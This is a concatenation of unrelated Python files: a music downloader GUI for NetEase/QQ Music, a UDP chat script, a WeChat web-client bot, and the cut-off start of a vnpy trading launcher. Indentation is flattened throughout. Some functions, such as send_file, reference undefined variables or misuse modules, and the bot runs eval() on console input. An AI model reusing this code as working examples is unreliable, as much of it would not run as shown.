"http://dl.stream.qqmusic.qq.com"
"/{file_name}?vkey={v_key}&guid=9362313912"
"&uin=0&fromtag=66"
)
def search_qq_music(music_name, singer):
messages_queue.append("Searching on QQ Music...")
url = QQ_music_search_tip_api.format(page=1, song_name=music_name)
json_obj = get_response(url)
songs = json_obj["data"]["song"]["list"]
target_id = ""
for item in songs:
item_singer = item["singer"][0]["name"]
if item_singer == singer:
target_id = item["mid"]
break
return target_id
def get_qq_music_dl_info(mid):
url = QQ_music_song_info_api.format(song_id=mid)
json_obj = get_response(url)
song_obj = json_obj["data"]["items"][0]
return (song_obj["vkey"], song_obj["filename"])
def download_qq_music(song_vkey, song_title, song_file_name):
url = QQ_music_song_dl_api.format(file_name=song_file_name, v_key=song_vkey)
if len(song_vkey) == 0:
messages_queue.append(
"❌ Failed to download from QQ, you may need to pay for it separately."
)
return ""
ext = song_file_name.split(".")[-1]
file_name = ".".join([song_title, ext])
res = requests.get(url)
with open(file_name, "wb") as f:
f.write(res.content)
return file_name
def convert_to_mp3(other_media):
# out_file = f"{".".join(other_media.split(".")[:-1])}.mp3"
    out_file = ".".join(other_media.split(".")[:-1]) + ".mp3"
messages_queue.append(
"Converting {origin} to {mp3}".format(origin=other_media, mp3=out_file)
)
out_bytes = subprocess.check_output(
["ffmpeg", "-i", other_media, "-c:a", "libmp3lame", "-aq", "2", out_file]
)
messages_queue.append(out_bytes)
return out_file
def try_get_file_in_qq_music(song_name, singer):
messages_queue.append("Searching on QQ Music...")
try:
music_id = search_qq_music(song_name, singer)
(song_v_key, song_file_name) = get_qq_music_dl_info(music_id)
song_file = download_qq_music(song_v_key, song_name, song_file_name)
mp3_file = ""
if len(song_file) == 0:
return None
if song_file.split(".")[-1] != "mp3":
mp3_file = convert_to_mp3(song_file)
os.remove(song_file)
return mp3_file
except Exception as e:
messages_queue.append(e)
def download_file(file_url, folder="", export_file_name=None, extension=None):
if not file_url or len(file_url) == 0:
messages_queue.append("Invalid download link.")
return None
if not extension:
extension = file_url.split(".")[-1]
if not export_file_name:
export_file_name = file_url.split("/")[-1]
file = ""
if len(folder) == 0:
file = f"{export_file_name}.{extension}"
else:
file = f"{folder}/{export_file_name}.{extension}"
if os.path.exists(file):
messages_queue.append("File already exists!")
return file
with requests.get(file_url, stream=True) as response:
        # maximum chunk size per request
        chunk_size = 1024
        # total content size, taken from the response headers
content_size = int(response.headers["content-length"])
progress = ProgressBar(
f"{export_file_name}.{extension}",
total=content_size,
unit="kb",
chunk_size=chunk_size,
run_status="Downloading",
fin_status="Download completed",
)
with open(file, "wb") as file:
for data in response.iter_content(chunk_size=chunk_size):
file.write(data)
progress.refresh(count=len(data))
return file
def slugify(value, allow_unicode=False):
messages_queue.append(
"Reformatting the file name to os-safe name. The actual audio tags are not changed."
)
# Taken from django (thanks guys!). Modified by robonxt. Supports utf-8.
# Removes spaces (turns into hyphens), dangerous file system characters (like /, \, etc) into underscores
value = str(value)
if allow_unicode:
value = unicodedata.normalize("NFKC", value).strip()
else:
value = (
unicodedata.normalize("NFKD", value)
.encode("ascii", "ignore")
.decode("ascii")
)
# value = re.sub(r'[^\w\s-]', '', value).strip().lower()
value = re.sub(r"[^\w\s-]", "_", value).strip()
return re.sub(r"[-\s]+", "-", value)
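# Illustrative example (made-up title): with allow_unicode=True,
#   slugify("My Song / Demo", True)  ->  "My-Song-_-Demo"
# spaces collapse to hyphens and filesystem-unsafe characters become underscores.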
def install_lame():
ret = subprocess.check_output(["brew", "install", "lame"])
messages_queue.append(ret)
def add_poster(poster, title, artists, album, year, track, music, br):
ret = os.system("lame --version")
if ret != 0:
install_lame()
try:
params = [
"lame",
"--tt",
title,
"--ta",
artists,
"--tl",
album,
"--ty",
str(year),
"--tc",
str(track),
"--tg",
"13",
"--ti",
poster,
"-b",
str(br),
music,
]
out_bytes = subprocess.check_output(params)
messages_queue.append(out_bytes.decode("utf-8"))
if remove_file(poster):
messages_queue.append("The coverart was applied successfully.")
if remove_file(music):
messages_queue.append("Song file was downloaded successfully.")
old_file = f"{music}.{music.split('.')[-1]}"
if os.path.exists(old_file):
os.rename(old_file, music)
except Exception as e:
messages_queue.append(e)
def remove_file(file):
if os.path.exists(file):
os.remove(file)
return True
return False
def string_to_list(s):
result = []
for part in s.split(","):
if "-" in part:
a, b = part.split("-")
a, b = int(a), int(b)
result.extend(range(a, b + 1))
else:
a = int(part)
result.append(a)
return result
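# Illustrative example: range strings typed by the user are expanded into
# 1-based track indices, e.g. string_to_list("1-3,7") -> [1, 2, 3, 7].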
def get_itunes_library_path():
itunes_path = "~/Music/iTunes/iTunes Media/" "Automatically Add to iTunes"
path = os.path.expanduser(itunes_path)
ext = os.path.exists(path)
if not ext:
itunes_path = (
"~/Music/iTunes/iTunes Media/" "Automatically Add to iTunes.localized/"
)
return os.path.expanduser(itunes_path)
def main_downloader_script():
messages_queue.append("Message")
if URL_KEY.startswith("http"):
messages_queue.append("URL_KEY OK!")
pass
else:
messages_queue.append("URL_KEY BAD!!")
        messages_queue.append("Usage error.")
# show_usage()
sys.exit(-1)
# print_welcome()
messages_queue.append(f"output folder path: {FOLDER_PATH_KEY}")
range_str = ""
if judge_if_playlist(URL_KEY):
download_playlist(URL_KEY, folder=FOLDER_PATH_KEY, range=range_str)
elif judge_if_album(URL_KEY):
download_album(URL_KEY, folder=FOLDER_PATH_KEY)
elif judge_if_mv(URL_KEY):
download_mv(URL_KEY, folder=FOLDER_PATH_KEY)
else:
download_music(URL_KEY, folder=FOLDER_PATH_KEY)
def judge_if_playlist(url):
if url.find("playlist") != -1:
return True
return False
def judge_if_album(url):
if url.find("album") != -1:
return True
return False
def judge_if_mv(url):
if url.find("mv") != -1:
return True
return False
def year_of_timestamp(unix_time):
return time.localtime(unix_time)[0]
class Music:
def __init__(self, title, artists, album, year, track, poster, br):
self.title = title
self.artists = ",".join(artists)
self.album = album
self.year = year
self.track = track
self.poster = poster
self.br = br
class ProgressBar(object):
def __init__(
self,
title,
count=0.0,
run_status=None,
fin_status=None,
total=100.0,
unit="",
sep="/",
chunk_size=1.0,
):
super(ProgressBar, self).__init__()
self.info = "【%s】%s %.2f %s %s %.2f %s"
self.title = title
self.total = total
self.count = count
self.chunk_size = chunk_size
self.status = run_status or ""
self.fin_status = fin_status or " " * len(self.status)
self.unit = unit
self.sep = sep
def __get_info(self):
        # [title] status  count unit  separator  total unit
_info = self.info % (
self.title,
self.status,
self.count / self.chunk_size,
self.unit,
self.sep,
self.total / self.chunk_size,
self.unit,
)
return _info
def refresh(self, count=1, status=None):
self.count += count
# if status is not None:
self.status = status or self.status
end_str = "\r"
if self.count >= self.total:
end_str = "\n"
self.status = status or self.fin_status
messages_queue.append(self.__get_info())
def print_exception_solution(e):
if type(e) == ModuleNotFoundError:
messages_queue.append("Module not found.")
messages_queue.append("Modules needed:requests, json, re, os, subprocess, sys")
messages_queue.append(
'Please use "pip3 install [module]" to install the corresponding module'
)
messages_queue.append(e)
elif type(e) == TypeError:
messages_queue.append("Type Error")
messages_queue.append(e)
else:
messages_queue.append(e)
def print_welcome():
messages_queue.append("Welcome to Netease CloudMusic Downloader")
messages_queue.append(
"\t1. This tool can download most of Netease Cloud Music songs,"
)
messages_queue.append(
"\t except for separate payment songs (such as Taylor Swift)"
)
messages_queue.append(
"\t2. You can download both songs and full playlists. Just paste the url correctly."
)
messages_queue.append(
"\t3. You can download a full playlists or just some songs from a playlist."
)
messages_queue.append(
"\t4. In order to get song with coverart and song info, remember to install lame."
)
messages_queue.append("\t (you can download it on Homebrew or google it)")
    messages_queue.append("\t5. You can also download MVs and download the highest")
    messages_queue.append(
        "\t resolution for MVs by default (TODO: Add MV resolution selection)"
    )
messages_queue.append("\t6. Version: {}".format(__VERSION__))
messages_queue.append("\t7. Compilation date: {}".format(__DATE__))
    messages_queue.append("\t8. Author: {}".format(__AUTHOR__))
    messages_queue.append("\t9. Fixed/Modded: {}".format(__AUTHOR_MODDER__))
    messages_queue.append("\t10. Translations: {}".format(__TRANSLATIONS__))
messages_queue.append(
"\tNOTE: PLEASE APPLY TO YOUR CORRESPONDING COPYRIGHT LAWS IN YOUR COUNTRY."
)
class MainWindow(ttk.Frame):
def __init__(self, master, **kwargs):
super().__init__(master, **kwargs)
self.folderpath = FOLDER_PATH_KEY
self.URLpath = ""
self.playlist = []
self.master = master
self.entryURLFrame = ttk.Frame(self)
self.URL_label = ttk.Label(self.entryURLFrame, text="URL: ")
self.entryURL = ttk.Entry(self.entryURLFrame)
self.download_button = ttk.Button(
self.entryURLFrame, text="Download", command=self.download_now
)
self.folder_button = ttk.Button(
self, text="Pick Folder", command=self.save_folder
)
self.folder_label = ttk.Label(self, text="Save to folder: " + self.folderpath)
self.output = scrolledtext.ScrolledText(self)
self.entryURLFrame.pack()
self.URL_label.pack(side=tk.LEFT)
self.entryURL.pack(side=tk.LEFT)
self.download_button.pack(side=tk.LEFT)
self.folder_button.pack()
self.folder_label.pack()
self.output.pack()
threading.Thread(target=self.get_queue, daemon=True).start()
def save_folder(self):
self.folderpath = filedialog.askdirectory()
# messages_queue.append(self.folderpath)
# messages_queue.append(self.folderpath.split("/"))
splitted_folderpath = self.folderpath.split("/")
clean_folderpath = "/".join(
[
splitted_folderpath[0],
splitted_folderpath[1],
splitted_folderpath[2],
"...",
splitted_folderpath[-2],
splitted_folderpath[-1],
]
)
self.folder_label.configure(text=f"Save to folder: {clean_folderpath}")
def download_now(self):
global URL_KEY
global FOLDER_PATH_KEY
URL_KEY = self.entryURL.get()
FOLDER_PATH_KEY = self.folderpath
threading.Thread(
target=self.run,
).start()
def run(self):
self.download_button.configure(state="disabled")
try:
main_downloader_script()
except:
pass
self.download_button.configure(state="enabled")
def get_queue(self):
while True:
            if messages_queue:
                # str() so exceptions or bytes placed on the queue don't break insert()
                self.output.insert(tk.END, str(messages_queue.pop(0)) + "\n")
                self.output.yview(tk.END)
            else:
                time.sleep(0.05)  # avoid busy-waiting while the queue is empty
if __name__ == "__main__":
t = MainWindow
root = None
try:
root = tk.Tk()
root.geometry("500x300")
root.resizable(False, False)
root.title("NetEaseMusic-UI")
t = t(root)
t.pack()
# root.resizable(False)
root.mainloop()
except RuntimeError:
root.destroy()
exit(0)
messages_queue.append("oops")
|
UDPChat.py
|
#########################
# UDP chat
#########################
from threading import Thread
from socket import *
# 1. Receive data, then print it
def receive_data():
while True:
receive_info = udpSocket.recvfrom(1024)
        print(">>%s:%s" % (str(receive_info[1]), receive_info[0].decode("gb2312")))
# 2. Read keyboard input and send the data
def send_data():
while True:
send_info = input("<<")
udpSocket.sendto(send_info.encode("gb2312"), (destIp, destPort))
udpSocket = None
destIp = ""
destPort = 0
def main():
global udpSocket
global destIp
global destPort
    destIp = input("Peer IP: ")
    destPort = int(input("Peer port: "))
udpSocket = socket(AF_INET, SOCK_DGRAM)
udpSocket.bind(("", 4567))
tr = Thread(target=receive_data)
ts = Thread(target=send_data)
tr.start()
ts.start()
tr.join()
ts.join()
if __name__ == "__main__":
main()
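# Usage sketch (addresses are examples): run this script on two machines; each
# instance binds UDP port 4567, so enter the other machine's IP and port 4567
# when prompted and the two sides can exchange messages.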
|
core.py
|
import contextlib
import hashlib
import json
import pathlib
import threading
import time
from dataclasses import dataclass
from io import BytesIO
import execjs
import filetype
import requests
import requests_html
from imgcat import imgcat
from PIL import Image
from retry import retry
from urlextract import URLExtract
from webot.common import (
addfailed,
addsucess,
check_path,
check_times,
error_log,
format_sunburst_city,
get_pic,
init_path,
)
from webot.conf import conf
from webot.data import *
from webot.exporter import create_json, load_worker, save_file, save_worker
from webot.log import debug, error, info, success, warning
from webot.parser import Parser
from webot.util import Device
with contextlib.redirect_stdout(None):
import pygame
@dataclass()
class Webot:
__session = requests_html.HTMLSession()
__session.headers = conf.fakeHeader
__session.cookies = requests_html.requests.utils.cookiejar_from_dict(
{
"MM_WX_NOTIFY_STATE": "1",
"MM_WX_SOUND_STATE": "1",
"mm_lang": "zh_CN",
"login_frequency": "1",
}
)
    __thread_pool = {}  # task pool
    __voice_pool = []  # voice message pool
    __is_online = True  # online flag, starts as online
    __appid = "wx782c26e4c19acffb"  # appID
    __encoding = None  # default encoding
    __batch_contacts = {}  # group (chat room) info
    __person_map = {}  # translated contact map
    __qr_code_uuid = None  # QR code UUID
    __qr_code_img = None  # QR code image
    __device_id = Device.create_device_id()
    __msg_id = None  # message id
    __hot_reload = None  # hot-reload flag
def get(self, url, *args, **kargs):
resp = self.__session.get(url, *args, **kargs)
if not resp.status_code == 200 and resp.content:
raise AssertionError()
resp.encoding = "utf8"
return resp
def post(self, url, *args, **kargs):
resp = self.__session.post(url, *args, **kargs)
if not resp.status_code == 200 and resp.content:
raise AssertionError()
resp.encoding = "utf8"
return resp
@error_log(raise_exit=True)
def get_qrcode_uid(self):
"""
        Get the QR code UUID
"""
resp = self.get(API_jsLogin)
self.__qr_code_uuid = Parser.get_qr_code_uuid(resp)
self.__encoding = Parser.get_encoding(resp)
@error_log()
def show_qrcode_local(self, buffer):
with pathlib.Path(API_qrcode_name).open("wb") as image:
image.write(buffer)
self.__qr_code_img = Image.open(API_qrcode_name)
self.__qr_code_img.show()
@error_log(raise_exit=True)
def get_qrcode_img(self):
"""
        Fetch and display the login QR code
"""
resp = self.get(f"{API_qrcode}{self.__qr_code_uuid}")
Device.show_qrcode(resp.content, self.show_qrcode_local)
@error_log()
def get_base_request(self):
"""
        Build the BaseRequest payload
"""
base_request = {
"BaseRequest": {
"Uin": self.__auth_data["wxuin"],
"Sid": self.__auth_data["wxsid"],
"Skey": self.__auth_data["skey"],
"DeviceID": Device.create_device_id(),
}
}
return base_request
@error_log()
def create_synckey(self):
"""
        Assemble the synckey string
"""
synckey = "|".join(
[
f"{item['Key']}_{item['Val']}"
for item in self.__person_data["SyncKey"]["List"]
]
)
        debug(f"Synckey: [{synckey}]")
return synckey
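    # Illustrative example (the key/value numbers are made up): with
    # SyncKey["List"] == [{"Key": 1, "Val": 100}, {"Key": 2, "Val": 200}] the
    # method returns "1_100|2_200", which is what get_msg_signal() below passes
    # as the synckey parameter.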
@retry()
@error_log(raise_err=True)
def login_wait(self, local=None):
"""
        Poll the login status endpoint
"""
return self.get(
API_login if local else API_check_login,
params={
"loginicon": "true",
"uuid": self.__qr_code_uuid,
"tip": 1 if local else 0,
"r": Device.get_timestamp(True),
"_": Device.get_timestamp(),
},
timeout=API_checktimeout,
)
@error_log(raise_err=True)
def login_push_wait(self):
"""
        Short-lived hot re-login (push login)
"""
self.__session.cookies.update(
requests_html.requests.utils.cookiejar_from_dict({"login_frequency": "2"})
)
resp = self.get(
API_webwxpushloginurl, params={"uin": self.__session.cookies.get("wxuin")}
)
self.__qr_code_uuid = resp.json()["uuid"]
info(f"New UUID: [{self.__qr_code_uuid}]")
return True
def login_localwait(self):
"""
        Wait for the phone to scan the QR code
"""
warning("Waiting for app scan")
self.login_wait(True)
if self.__qr_code_img:
self.__qr_code_img.fp.close()
@error_log(raise_err=True)
def login_appwait(self, get_ticket=True):
"""
        Wait for the phone to confirm the login
"""
warning("Waiting for app confirm")
resp = self.login_wait(False)
if get_ticket:
success("Login Success")
self.__get_ticket_url = Parser.get_get_ticket_url(resp)
@error_log()
def get_ticket(self):
"""
        Fetch the personal-info ticket and update part of the cookies
"""
info(f"Redirect to --> {self.__get_ticket_url}")
resp = self.get(
self.__get_ticket_url,
params={"fun": "new", "lang": "zh_CN", "_": Device.get_timestamp()},
)
info(
f"Get Ticket:{requests_html.requests.utils.dict_from_cookiejar(resp.cookies)}"
)
self.__auth_data = Parser.get_auth_data(resp)
self.__session.cookies.update(
requests_html.requests.utils.cookiejar_from_dict(
{"last_wxuin": self.__auth_data["wxuin"]}
)
)
if list(filter(lambda item: item[1], self.__auth_data.items())):
return True
def login(self):
"""
        Obtain the authentication data
"""
if self.__hot_reload and check_path(API_hotreload_file):
try:
(
self.__session,
self.__auth_data,
self.__person_data,
self.__get_ticket_url,
) = load_worker(API_hotreload_file)
# self.login_push_wait()
# self.login_appwait(False)
except Exception:
error("Hot reload timeout!")
self.__hot_reload = False
self.login()
else:
self.get_qrcode_uid()
self.get_qrcode_img()
self.login_localwait()
self.login_appwait()
@error_log()
def login_success_init(self):
"""
        Initialize WeChat state after a successful login
"""
resp = self.post(
API_webwxinit,
params={"pass_ticket": self.__auth_data["pass_ticket"], "lang": "zh_CN"},
json=self.get_base_request(),
)
resp.encoding = "utf8"
self.__person_data = resp.json()
self.__nick = self.__person_data["User"]["NickName"]
conf.my_id = self.__person_data["User"]["UserName"]
create_json(self.__person_data, API_static_path / "person_data.json")
success(
f"{'Welcome'.center(20,'*')}: [{self.__person_data['User']['NickName']}]"
)
save_worker(
(
self.__session,
self.__auth_data,
self.__person_data,
self.__get_ticket_url,
),
API_hotreload_file,
)
@error_log()
def get_msg_id(self):
"""
        Get the message identity id
"""
jsondata = self.get_base_request()
jsondata.update(
{
"Code": 3,
"FromUserName": self.__person_data["User"]["UserName"],
"ToUserName": self.__person_data["User"]["UserName"],
"ClientMsgId": Device.create_client_msg_id(),
}
)
resp = self.post(
API_webwxstatusnotify,
params={"lang": "zh_CN", "pass_ticket": self.__auth_data["pass_ticket"]},
json=jsondata,
)
self.__msg_id = resp.json()["MsgID"]
def get_msg_signal(self):
"""
        Check for a new-message signal
"""
call_back = {"retcode": "0", "selector": "0"}
try:
resp = self.get(
API_synccheck,
params={
"r": Device.get_timestamp(),
"skey": self.__auth_data["skey"],
"sid": self.__auth_data["wxsid"],
"uin": self.__auth_data["wxuin"],
"deviceid": self.__device_id,
"synckey": self.create_synckey(),
"_": Device.get_timestamp(),
},
timeout=API_checktimeout,
)
if resp.status_code != 200:
raise AssertionError()
call_back = execjs.eval(resp.text.replace("window.synccheck=", ""))
except requests.exceptions.Timeout: # covers ReadTimeout as well
pass
except Exception as e:
error(e)
time.sleep(1)
return call_back
@retry()
@error_log(raise_exit=True)
def get_msg_contents(self):
"""
Fetch message details
"""
jsondata = self.get_base_request()
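# "rr" is the bitwise NOT of the current timestamp (evaluated via execjs), mirroring what the web client sends.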
jsondata.update(
{"rr": execjs.eval("~new Date"), "SyncKey": self.__person_data["SyncKey"]}
)
resp = self.post(
API_webwxsync,
params={
"lang": "zh_CN",
"sid": self.__auth_data["wxsid"],
"skey": self.__auth_data["skey"],
"pass_ticket": self.__auth_data["pass_ticket"],
},
json=jsondata,
)
resp.encoding = "utf8"
res = resp.json()
self.__person_data["SyncKey"] = res["SyncKey"]
return res
@error_log(raise_exit=True)
def get_contact(self):
"""
Fetch the basic contact list
"""
resp = self.get(
API_webwxgetcontact,
params={
"lang": "zh_CN",
"pass_ticket": self.__auth_data["pass_ticket"],
"r": Device.get_timestamp(),
"seq": 0,
"skey": self.__auth_data["skey"],
},
)
self.__contacts = resp.json()
create_json(self.__contacts, API_static_path / "contacts.json")
info(f"Get friends: [{self.__contacts['MemberCount']}]")
@error_log()
def get_batch_contact(self, contact_list: list = None):
"""
Fetch group (batch) contacts
"""
debug("Updating batch contacts")
if not contact_list:
contact_list = self.__person_data["ChatSet"].split(",")
debug(f"contact targets[{len(contact_list)}]")
contact_list = list(
filter(lambda name: name not in self.__person_map, contact_list)
)
debug(f"contact filter result[{len(contact_list)}]")
if not contact_list:
return
for room in [
{"UserName": item, "EncryChatRoomId": ""}
for item in contact_list
if "@@" in item
]:
batch = [room]
jsondata = self.get_base_request()
jsondata.update({"Count": len(batch), "List": batch})
resp = self.post(
API_webwxbatchgetcontact,
params={
"type": "ex",
"r": Device.get_timestamp(),
"lang": "zh_CN",
"pass_ticket": self.__auth_data["pass_ticket"],
},
json=jsondata,
)
self.__batch_contacts.update(resp.json())
self.__person_map = Device.trans_map(self.__contacts, self.__batch_contacts)
debug(f"current contacts[{len(self.__person_map)}]")
create_json(self.__batch_contacts, API_static_path / "batch_contacts.json")
@error_log()
def get_image(self, msg_id, play=False):
"""
Fetch image data
"""
resp = self.get(
API_webwxgetmsgimg,
params={"msgid": msg_id, "skey": self.__auth_data["skey"]},
)
if play:
imgcat(resp.content)
return resp.content
@error_log()
def get_voice(self, msg_id, play=False):
"""
Fetch voice data
"""
resp = self.get(
API_webwxgetvoice,
params={"msgid": msg_id, "skey": self.__auth_data["skey"]},
)
if play:
self.__voice_pool.insert(0, BytesIO(resp.content))
return resp.content
@error_log()
def get_video(self, msg_id, play=False):
"""
Fetch video data
"""
# self.get_image(msg_id, play)
content = BytesIO()
for item in self.__session.get(
API_webwxgetvideo,
params={"msgid": msg_id, "skey": self.__auth_data["skey"]},
headers={"Range": "bytes=0-"},
stream=True,
).iter_content():
content.write(item)
if play:
pass
return content.getvalue()
def check_online_status(self):
"""
Check online status
"""
try:
while True:
if not self.__is_online:
warning("ready for logout")
for name, threadTarget in self.__thread_pool.items():
debug(f"{name} closed!")
threadTarget.join()
success("end!")
exit()
time.sleep(1)
except Exception:
self.__is_online = False
@error_log()
def send_text(self, target, msg):
"""
Send a text message
"""
jsondata = self.get_base_request()
LocalID = str(execjs.eval("+new Date()"))
jsondata.update(
{
"Msg": {
"Type": 1,
"Content": msg,
"FromUserName": self.__person_data["User"]["UserName"],
"ToUserName": target,
"LocalID": LocalID,
"ClientMsgId": LocalID,
},
"Scene": 0,
}
)
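# Browser-like headers below are presumably there so webwxsendmsg treats the request like the official web client.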
fakeHeader = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Content-Type": "application/json;charset=UTF-8",
"Host": "wx.qq.com",
"Origin": "https://wx.qq.com",
"Referer": "https://wx.qq.com/?&lang=zh_CN",
"User-Agent": "Webot/1.0",
}
resp = self.post(
API_webwxsendmsg,
params={"lang": "zh_CN", "pass_ticket": self.__auth_data["pass_ticket"]},
data=json.dumps(jsondata, ensure_ascii=False).encode("utf-8"),
headers=fakeHeader,
)
warning(self.translate_text(f"🤖️->【{target}】: {msg}"))
debug(resp.json())
@error_log()
def send_file(self, target, filename):
"""
Send a file
"""
with pathlib.Path(filename).open("rb") as file:
datas = file.read()
lens = len(datas)
self.post(
API_webwxuploadmedia,
params={"f": "json"},
json={
"id": "WU_FILE_0",
"name": filename,
"type": filetype(BytesIO(data)).mime,
"lastModifiedDate": "Tue May 21 2019 00:00:00 GMT 0800 (中国标准时间)",
"size": lens,
"mediatype": "pic",
"uploadmediarequest": {
"UploadType": 2,
"BaseRequest": self.get_base_request(),
"ClientMediaId": Device.get_timestamp(),
"TotalLen": lens,
"StartPos": 0,
"DataLen": lens,
"MediaType": 4,
"FromUserName": self.__person_data["User"]["UserName"],
"ToUserName": target,
"FileMd5": hashlib.new("md5", datas).hexdigest(),
},
"webwx_data_ticket": self.__session.cookies.get(
"webwx_data_ticket", ""
),
"pass_ticket": self.__auth_data["pass_ticket"],
"filename": datas,
},
headers={
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryrUwfuyA8mLqHyBJP",
"DNT": "1",
"Origin": "https://wx.qq.com",
"Referer": "https://wx.qq.com/",
"User-Agent": "Webot/1.0",
},
)
def search_friend(self, strs):
"""
Search friends
"""
for index, value in enumerate(self.__contacts["MemberList"]):
if strs in value["NickName"]:
print(
f"[{index}]{value['NickName'].ljust(4)}{value['UserName'].rjust(10)}"
)
def index_friend(self, hashid):
"""
Look up a friend by UserName
"""
for value in self.__contacts["MemberList"]:
if hashid == value["UserName"]:
return value
return {}
def msg_worker(self):
"""
Message processing
"""
debug("start msg worker")
def worker():
debug("start main loop")
while True:
try:
sync_check_res = self.get_msg_signal()
debug(f"sync_check_res: {sync_check_res}")
retcode, selector = (
sync_check_res["retcode"],
sync_check_res["selector"],
)
if retcode == "0" and int(selector) > 0:
msgs = self.get_msg_contents()
debug(f"Contents: {msgs}")
for msg in msgs["AddMsgList"]:
_, result = self.data_ctrl(msg)
self.send_back(result)
elif retcode == "1101":
self.__is_online = False
warning("main loop offline")
return
except KeyboardInterrupt:
return
except Exception as e:
error(e)
finally:
time.sleep(0.1)
def interaction():
"""
Simple interactive console
"""
debug("start isnteraction")
while True:
if not self.__is_online or not conf.need_interaction:
warning("isnteraction offline")
return
try:
cmd = input(">>>")
if not cmd:
pass
else:
print(eval(cmd))
except Exception as e:
error(e)
finally:
time.sleep(0.1)
def voice():
"""
Voice message playback
"""
debug("start voice detector")
pygame.mixer.init()
while True:
if not self.__is_online:
warning("voice detector offline")
return
while self.__voice_pool:
pygame.mixer.music.load(self.__voice_pool.pop())
pygame.mixer.music.play()
time.sleep(2)
def trystart(item):
try:
item.start()
except Exception as e:
error(e)
self.__thread_pool["msg_hook"] = threading.Thread(target=worker)
self.__thread_pool["voice_hook"] = threading.Thread(target=voice)
self.__thread_pool["interaction"] = threading.Thread(target=interaction)
list(map(lambda item: trystart(item[1]), self.__thread_pool.items()))
self.check_online_status()
def msg_is_self(self, target):
return target["FromUserName"] == self.__person_data["User"]["UserName"]
@error_log()
def data_ctrl(self, msg):
"""
Print the basic message info and organize it
"""
msg_type = msg["MsgType"]
sub_type = msg["SubMsgType"]
is_me = self.msg_is_self(msg)
is_group = "@@" in msg["FromUserName"]
content_header = "👥" if is_group else "💬"
to_user_name = "" if is_group else f'-> 【{msg["ToUserName"]}】'
func = info if is_me else success
content = f'{content_header}【{msg["FromUserName"]}】{to_user_name}:'
create_json(msg, str(API_static_path / "⚡️current_msg.json")) # dump for real-time log analysis
result = {
"time": msg["CreateTime"],
"from": msg["FromUserName"],
"from_nick": self.translate_text(msg["FromUserName"]),
"to": msg["ToUserName"],
"to_nick": self.translate_text(msg["ToUserName"]),
"type": MSG_TYPES[msg_type].lower(),
"content": "",
"raw_content": msg["Content"],
"is_me": is_me,
"is_group": is_group,
}
self.get_batch_contact([msg["FromUserName"],msg["ToUserName"]])
number = f"{result['time']}_{result['from_nick']}_{msg['MsgId']}" # 消息编号
if msg_type == MSGTYPE_TEXT:
if sub_type == 0:
result["content"] = msg["Content"]
elif sub_type == 48:
result["content"] = msg["Content"].split(":")[0]
self.on_text(result)
elif msg_type == MSGTYPE_VOICE:
voice = self.get_voice(msg["MsgId"], conf.play_voice)
filename = str(API_meida_voice_path / f"{number}.mp3")
save_file(voice, filename)
result["content"] = filename
self.on_voice(result)
elif msg_type == MSGTYPE_VIDEO:
video = self.get_video(msg["MsgId"], True)
filename = str(API_meida_video_path / f"{number}.mp4")
save_file(video, filename)
result["content"] = filename
self.on_video(result)
elif msg_type == MSGTYPE_IMAGE:
image = self.get_image(msg["MsgId"], True)
filename = str(API_meida_image_path / f"{number}.png")
save_file(image, filename)
result["content"] = filename
self.on_image(result)
elif msg_type == MSGTYPE_EMOTICON:
urls = URLExtract().find_urls(msg["Content"])
if not urls:
return
filename = str(API_meida_emoji_path / f"{number}.png")
imgcat(get_pic(self.__session, urls[0], filename))
result["content"] = urls[0]
self.on_emoji(result)
elif msg_type == MSGTYPE_APP:
pass
# content += "公众号推送"
elif msg_type == MSGTYPE_STATUSNOTIFY:
# content += "进入/退出"
pass
if msg_type not in [] and result["content"]:
func(self.translate_text(content + result["content"]))
return msg, result
def on_text(self, msg):
pass
def on_video(self, msg):
pass
def on_voice(self, msg):
pass
def on_image(self, msg):
pass
def on_emoji(self, msg):
pass
def revice(self, msg):
pass
def send_back(self, msg):
pass
# """
# Auto reply
# """
# if not target:
# target = msg["FromUserName"]
# else:
# try:
# target = list(
# filter(lambda item: item[1] == target, self.__person_map.items())
# )[0][0]
# except Exception as e:
# print(e)
# if target in [
# self.__person_data["User"]["UserName"],
# self.__person_data["User"]["NickName"],
# ]: # skip if the target is myself
# return
# if "@@" in target and not groups: # 判断是否为群组
# return
# if "gh_" == self.index_friend(target).get("KeyWord", ""): # 判断是否为公众号
# return
# content = msg["Content"].replace(YOUR_NAME, "你") # 反骂功能
# msg_type = msg["MsgType"]
# if msg_type == MSGTYPE_TEXT:
# self.send_msg(target, content)
# def filter_msg(self)
def translate_text(self, words):
"""
Prettify message text by replacing raw ids with nicknames
"""
for k, v in self.__person_map.items():
words = words.replace(k, v)
return words
@error_log()
def run_add_on(self):
debug("check add on")
if conf.export_xlsx:
Device.export_all_contact(
self.__contacts, self.__session, self.__person_data
)
if conf.make_icon_wall:
Device.make_icon_wall(
API_media_icon_path,
API_analysis_path / f"{self.__nick}_icon_wall.png",
patterns="*_0",
)
if conf.sunburst_city:
Device.export_sunburst_city(
self.__contacts, API_analysis_path / f"{self.__nick}_sunburst_city.html"
)
@error_log(raise_exit=True)
def run(
self,
hot_reload=None,
export_xlsx=None,
sunburst_city=None,
make_icon_wall=None,
debug=None,
interaction=None,
):
if hot_reload is not None:
self.__hot_reload = bool(hot_reload)
if export_xlsx is not None:
conf.export_xlsx = bool(export_xlsx)
if sunburst_city is not None:
conf.sunburst_city = bool(sunburst_city)
if make_icon_wall is not None:
conf.make_icon_wall = bool(make_icon_wall)
if debug is not None:
conf.debug = bool(debug)
if interaction is not None:
conf.need_interaction = bool(interaction)
self.login()
while not self.get_ticket():
self.__hot_reload = False
self.login()
self.login_success_init()
self.get_msg_id()
self.get_contact()
self.get_batch_contact()
self.run_add_on()
self.msg_worker()
if __name__ == "__main__":
Webot().run()
|
runCtaTrading.py
|
import multiprocessing
import os
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okexGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
def findConnectKey():
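"""Return the gateway name by locating a *_connect.json file in the working directory."""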
files=os.listdir(".")
for file in files:
if file.find("_connect.json")>=0:
return file.replace("_connect.json","")
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
